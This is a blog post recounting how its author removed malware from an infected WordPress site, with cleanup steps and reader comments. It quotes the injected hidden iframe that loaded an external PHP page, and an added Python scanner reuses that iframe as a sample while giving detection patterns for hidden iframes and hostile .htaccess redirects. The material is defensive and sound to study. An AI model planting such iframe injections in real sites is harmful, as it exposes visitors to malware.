How to Remove malware from website

In the morning, with a cup of tea, I sat down at my laptop to check my website. I tried to log in to the admin panel. Suddenly I got a message that malware had been detected on my website. The website hadn't had any problem before I went to sleep. I was astounded by this message. I hadn't faced this sort of problem before. I thought the problem was simple and would be sorted out just by contacting the hosting company for support. This problem happened on the same blog you are reading, just a couple of days ago. I use WordPress to build my blog and Justhost web hosting services.

I tried to talk with online support but I didn't get a relevant answer from them. They urged me to open a ticket for it. I opened a ticket describing my problem and got the following answer from the hosting company.

Please open your website and go to ‘Why my website was blocked’. You will have to follow Google instructions to have your website unblocked. Then you will have to wait until your site is re-indexed by Google. Unfortunately, it is beyond our capability to settle this issue.


Now I had to solve the problem all by myself. This problem was new to me. I thought it would be quite easy to just restore the backup that I had. Since I back up my blog daily, it was not a big problem for me. But when I checked the other websites that I was hosting on the same account, all of them had been infected. Now the problem seemed more complicated, since I didn't have backups available for all my websites. I had only one option left, and it was not that simple: I had to understand the problem myself and find the necessary solution. These are the steps I followed, which could be essential for you to eradicate this problem. Please note that the vulnerability and nature of malware differ from website to website.

1. Log in to Google Webmaster Tools and find the root cause of the problem.

Google's webmaster site has a good option for showing information about the malware, which is very useful in this situation. After logging in to your account and choosing your domain name (if you have added your domain to your webmaster account), you will be notified about the malware and the pages it has infected. The first step you should take is to find out the root cause of the problem.

In my case, three posts, including the main page, were detected, and numerous other websites hosted on the same domain were affected.

2. Change every password: cPanel, FTP account, database

In case a hacker is trying to hack your website, it's always a good idea to change every password. Please note that hackers are not always the cause of malware spreading.

3. Talk with your webhosting company.

It's always a good idea to tell your hosting company what has happened. In most cases web hosting companies are supportive. Describe your problem fully so that they can help. If your hosting company refuses to help you, like mine did, you will need to find the solution to your problem yourself. However, if you know the time when the problem first appeared on your website, you can ask the hosting company to restore your data from their backup to a point before the malware was detected.

4. Malicious File

In most cases the hacker tries to include a malicious script that redirects every visitor to a different website that contains malware. The file can be injected by a hacker in different ways. Sometimes it is injected into files on your web server. In my case, I found two files in public_html (the web root, where all the files are stored), that is, in the main pages. They were easy for me to find because I am using WordPress and there shouldn't be any JavaScript files in the main root directory. I found two different files with a bundle of script in them. Please note that the hacker sometimes only injects a pointer to a .js file.

5. Redirection in .htaccess file

The .htaccess file is a major tool used by hackers. Hackers modify the .htaccess file to redirect your users to another website. In my case there was no .htaccess modification.

You can find more about .htaccess attacks on this page.

6. Ensure that your computer is malware free.

As you probably know, your login info can be taken from your browser's cache by a virus, and the credentials for your hosting account can then be delivered to and used by somebody else. So the most vulnerable place can be your own PC, and I do advise you to have some good anti-virus software.

7. Script under a hidden iframe.

An iframe is another way to inject malware into your website. An iframe, also known as an inline frame, is a section of a web page that loads content from another web page. I found an iframe in the root directory and removed it.

<iframe src="http://somewebsite.info/in.php width=0 height=0 frameborder-0" width="320" height="240"></iframe>

Final Step: Patience is the most important thing if you are facing this problem. Google will take at least a day to recheck your website and remove the warning from your website. When you feel you have done everything necessary, you can request a malware review via Google Webmaster Tools. Please note that it took 2 days for the malware warning from Google to be removed in my case.
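
Steps 4, 5 and 7 can also be checked with a script instead of opening each file by hand. The following Python scanner is an added example, not code from the original post; its heuristics, the names `scan_webroot` and `demo`, and the hosts `myblog.example` and `elsewhere.example` are assumptions made for illustration.

```python
import os
import re
import tempfile
from pathlib import Path

HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*(?:\b(?:width|height)\s*=\s*[\"']?0\b"
    r"|display\s*:\s*none|visibility\s*:\s*hidden)", re.I)
EXTERNAL_REDIRECT = re.compile(
    r"^\s*(?:RewriteRule|Redirect\w*|ErrorDocument)\b.*?https?://([^/\s\"']+)", re.I | re.M)
SCANNED = {".php", ".html", ".htm", ".js"}

def scan_webroot(root, own_hosts):
    """Return sorted (path, finding) pairs; the heuristics are assumptions of this example."""
    root, findings = Path(root), []
    for folder, _dirs, names in os.walk(root):
        for name in names:
            path = Path(folder, name)
            rel, suffix = path.relative_to(root).as_posix(), path.suffix.lower()
            # Step 4: WordPress ships no JavaScript directly in the web root.
            if suffix == ".js" and path.parent == root:
                findings.append((rel, "js-in-web-root"))
            if name != ".htaccess" and suffix not in SCANNED:
                continue  # skip images and other files these checks do not read
            text = path.read_text(errors="replace")
            if name == ".htaccess":
                # Step 5: redirect directives that point at a host that is not ours.
                for hit in EXTERNAL_REDIRECT.finditer(text):
                    if hit.group(1).lower() not in own_hosts:
                        findings.append((rel, "external-redirect:" + hit.group(1).lower()))
            elif HIDDEN_IFRAME.search(text):
                # Step 7: iframe sized to zero or hidden with CSS.
                findings.append((rel, "hidden-iframe"))
    return sorted(findings)

def demo():
    samples = {  # constructed sample tree, written to a throwaway directory
        "index.php": '<iframe src="http://somewebsite.info/in.php width=0 height=0 '
                     'frameborder-0" width="320" height="240"></iframe>\n',
        "stats.js": "/* constructed: unexpected script in the root */\n",
        "wp-includes/js/jquery.js": "/* constructed: core script, expected */\n",
        ".htaccess": "RewriteRule . /index.php [L]\nRedirect 301 /old http://www.myblog.example/new\n"
                     "RewriteRule ^(.*)$ http://elsewhere.example/ [R=302,L]\n",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in samples.items():
            Path(tmp, rel).parent.mkdir(parents=True, exist_ok=True)
            Path(tmp, rel).write_text(body)
        return scan_webroot(tmp, {"myblog.example", "www.myblog.example"})
```

On a real site, pass the path of your own web root and the set of your own hostnames to `scan_webroot`, then review each finding by hand; a match is a lead to inspect, not proof of infection.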

Resources to Scan your website.

Wpmalwares provides a complete WordPress malware removal service. If you have a WordPress website, you can try their service.


3 Responses to How to Remove malware from website

  1. Kumar says:

    I have similar issues on my website. Can you please let me know how you found “Script under hidden I frame”? Thanks for posting a great article.

    • saugat says:

      Hello, I have already deleted the script under the iframe. I just found the iframe by checking each individual file that I had doubts about. You can check out the tools; maybe that helps to find the malware. If it doesn’t, you have to figure it out yourself.
